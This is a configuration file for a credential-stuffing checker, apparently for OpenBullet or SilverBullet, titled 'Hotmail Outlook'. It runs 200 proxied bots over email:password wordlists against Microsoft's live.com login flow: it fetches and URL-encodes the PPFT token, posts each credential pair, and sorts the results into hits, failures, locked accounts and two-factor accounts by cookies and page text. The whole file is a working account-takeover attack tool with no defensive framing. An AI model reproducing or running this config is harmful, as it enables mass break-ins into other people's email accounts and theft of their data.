[SETTINGS]
{
  "Name": "Hotmail Outlook",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2021-12-16T23:56:42.9490272+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "",
  "Version": "1.1.1 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Hotmail Outlook",
  "IconPath": "Icon\\svbfile.ico",
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#Email REQUEST POST "https://login.live.com/GetCredentialType.srf?opid=AB0C2C1F5A4A3367&id=292841&uiflavor=web&wa=wsignin1.0&rpsnv=13&ct=1639695710&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d299d4352-5d3e-f3a5-7638-0311b3f47ca3&id=292841&aadredir=1&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&mkt=EN-US&lc=1033&uaid=1aa0ab2968e9400099a3acc21326f1b8" 
  CONTENT "{\"username\":\"<USER>\",\"uaid\":\"1aa0ab2968e9400099a3acc21326f1b8\",\"isOtherIdpSupported\":true,\"checkPhones\":false,\"isRemoteNGCSupported\":true,\"isCookieBannerShown\":false,\"isFidoSupported\":true,\"forceotclogin\":false,\"otclogindisallowed\":false,\"isExternalFederationDisallowed\":false,\"isRemoteConnectSupported\":false,\"federationFlags\":3,\"isSignup\":false,\"flowToken\":\"Desi3DkcwqrtbQiRH4MbJp1!!zVqMkCu7xog9LDf4oVoKQluC5N!K3x2QTxrklvi3uxt!XB1TfUn5a8qruG4Wwh9EkQw4GJOWgQ6miseyEvY2l8yVQsiPFiV!mVKdb93nNOgKe6sr84snZ2Csxopgq84BLBiaJx6zIIq9bbJte9BH5dT7Vk8pgK*X6R9lm4hhKyurehTvPMl01pGbdDAwCpYC6XYpuf0tfWLnxSNCpECQkfCZg37Zn8hw3T5wsHiVQ$$\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "client-request-id: 1aa0ab2968e9400099a3acc21326f1b8" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 642" 
  HEADER "Content-type: application/json; charset=UTF-8" 
  HEADER "Cookie: MSCC=20.121.186.152-US; MSFPC=GUID=1fb324668dac4d9a9756d269c9856162&HASH=1fb3&LV=202112&V=4&LU=1639320115215; mkt=en-US; MUID=3961a09c3a42463b8d326591f3877c4d; wla42=c24zMzAxKjEsQUU5OUE3NTkzMkFEMzQzRSwwLCwwLC0xLC0x; logonLatency=LGN01=637752925106601663; uaid=1aa0ab2968e9400099a3acc21326f1b8; MSPRequ=id=292841&lt=1639695710&co=1; OParams=11O.DUPto3Zhb3Q2QmTnDnR**jWPQwHGVwtE51BRJhuolhTAUREwvDjVDU0icx5Q37QrjFN0nhfOQTPYGUUQ1IPtiowWMDjZfc702uydP9hlD0PS7TazYR4GqMrXm8UbBs4gUzwrcddjQeFB2O9rBRlZGSJlCg4U3MWKLUOlt6i3FgSQ6D0aOC*yY!36QkhL*aVpY0P6!p3dk2xJAFkYiSDoDO1IMpjE90magZXYhTCbl0No2*VPvUvzuR0C6PBNcOVawGdKWJhTFmSEEvd979!P0XPMw7eZoWO*xUsOmFRNsPzoPmUZXYq0m*Szjzsq4Yl8NQ5tTtsopBVCMzcLndCayJhJhW4AGDuaQ*Bw5GLALFzYSEcJE0dKklyGjs0v01oZA*tgcyV8!MVfzvnQKY!cNfCvBmAHwq3FLHPlANjqY1bUbwZNgwBUd2lwSUFlAuZZIn3Z9GfcxXL!B9BY7JdK5eA$; MSPOK=$uuid-5425bfc3-d50a-4c89-aa03-c310399a6c21" 
  HEADER "Host: login.live.com" 
  HEADER "hpgact: 0" 
  HEADER "hpgid: 33" 
  HEADER "Origin: https://login.live.com" 
  HEADER "Referer: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1639695710&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d299d4352-5d3e-f3a5-7638-0311b3f47ca3&id=292841&aadredir=1&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"96\", \"Google Chrome\";v=\"96\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 

#Get_PPFT REQUEST GET "https://login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=13&ct=1639695710&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d299d4352-5d3e-f3a5-7638-0311b3f47ca3&id=292841&aadredir=1&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&contextid=2E67A91A603C86E5&bk=1639695710&uaid=1aa0ab2968e9400099a3acc21326f1b8&pid=0" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#PPFT PARSE "<SOURCE>" LR "name=\"PPFT\" id=\"i0327\" value=\"" "\"" -> VAR "PP" 

#ENC_PP FUNCTION URLEncode "<PP>" -> VAR "PPP" 

#Login REQUEST POST "https://login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=13&ct=1639695710&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d299d4352-5d3e-f3a5-7638-0311b3f47ca3&id=292841&aadredir=1&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&contextid=2E67A91A603C86E5&bk=1639695710&uaid=1aa0ab2968e9400099a3acc21326f1b8&pid=0" 
  CONTENT "i13=0&login=<USER>&loginfmt=<USER>&type=11&LoginOptions=3&lrt=&lrtPartition=&hisRegion=&hisScaleUnit=&passwd=<PASS>&ps=2&psRNGCDefaultType=&psRNGCEntropy=&psRNGCSLK=&canary=&ctx=&hpgrequestid=&PPFT=<PPP>&PPSX=Pa&NewUser=1&FoundMSAs=&fspost=0&i21=0&CookieDisclosure=0&IsFidoSupported=1&isSignupPost=0&i19=407448" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<COOKIES(PPLState)>" Contains "1" 
    KEY "<COOKIES(__Host-MSAAUTH)>" Contains "*" 
  KEYCHAIN Failure OR 
    KEY "Your account or password is incorrect" 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "https://account.live.com/Abuse" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "https://account.live.com/recover"

